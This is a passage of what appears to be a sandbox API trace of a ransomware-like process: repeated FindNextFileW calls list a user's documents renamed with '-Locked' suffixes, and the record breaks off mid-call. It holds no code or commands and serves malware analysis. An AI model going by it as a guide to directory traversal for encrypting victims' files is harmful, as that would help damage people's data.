lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ab3ab5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ab3ab5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ab3ab5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0302.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335e853e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335e853e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335e853e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked-Locked", cAlternateFileName="1FEG~1.XLS")) returned 1 [0302.158] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ace7f4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ace7f4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ace7f4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0302.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335efa7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335efa7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335efa7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked-Locked", cAlternateFileName="2XKT2-~1.PPT")) returned 1 [0302.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ae0e22, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ae0e22, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ae0e22, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0302.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335f5e17, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335f5e17, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335f5e17, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked-Locked", cAlternateFileName="4YEBKI~1.XLS")) returned 1 [0302.159] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32af1d8c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32af1d8c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32af1d8c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0302.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335fbe0e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335fbe0e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335fbe0e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked-Locked", cAlternateFileName="4GH0Y9~2.PDF")) returned 1 [0302.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b00832, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b00832, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b00832, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0302.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33602049, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33602049, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33602049, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked-Locked", cAlternateFileName="88Z1O5~1.DOC")) returned 1 [0302.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b119bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b119bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b119bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0302.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336081fa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336081fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336081fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", cAlternateFileName="9WUI5E~1.DOC")) returned 1 [0302.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b22d39, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b22d39, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b22d39, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0302.161] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3360e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3360e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3360e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", cAlternateFileName="AWNRFZ~1.PPT")) returned 1 [0302.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b3156b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b3156b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b3156b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0302.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361452d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361452d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361452d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked-Locked", cAlternateFileName="AZYKAG~1.RTF")) returned 1 [0302.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b474bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b474bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b474bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0302.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361a6d4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361a6d4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361a6d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked-Locked", cAlternateFileName="BFC~1.DOC")) returned 1 [0302.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b55fb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b55fb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b55fb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0302.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336208d1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336208d1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336208d1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked-Locked", cAlternateFileName="CERXR1~1.XLS")) returned 1 [0302.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b63866, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b63866, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b63866, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0302.163] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33627dbf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33627dbf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33627dbf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0302.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b72239, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b72239, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b72239, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0302.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363059b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363059b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363059b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", cAlternateFileName="EUNC2M~1.XLS")) returned 1 [0302.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b831b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b831b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b831b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0302.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336367c9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336367c9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336367c9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", cAlternateFileName="FQNOQA~1.XLS")) returned 1 [0302.164] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ba8fd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ba8fd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ba8fd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0302.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363c98c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363c98c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363c98c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", cAlternateFileName="FUKBCY~1.PPT")) returned 1 [0302.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bc16b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bc16b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bc16b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0302.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364520b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364520b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364520b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked-Locked", cAlternateFileName="HBFGJD~2.DOC")) returned 1 [0302.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd1558, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bd1558, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bd1558, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0302.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked-Locked", cAlternateFileName="HUM71H~1.PDF")) returned 1 [0302.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0302.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32be4c72, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32be4c72, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32be4c72, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0302.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked-Locked", cAlternateFileName="JOED-0~1.PPT")) returned 1 [0302.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bf97aa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bf97aa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bf97aa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3366c3f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3366c3f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3366c3f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", cAlternateFileName="JYYUHN~1.OTS")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c09621, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c09621, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c09621, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0302.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336738ea, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336738ea, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336738ea, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked-Locked", cAlternateFileName="NYMPGD~1.DOC")) returned 1 [0302.168] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c1a8b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c1a8b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c1a8b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0302.168] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3367d592, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3367d592, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3367d592, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked-Locked", cAlternateFileName="O4ACLZ~1.DOC")) returned 1 [0302.168] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0302.180] FindNextFileW (in: 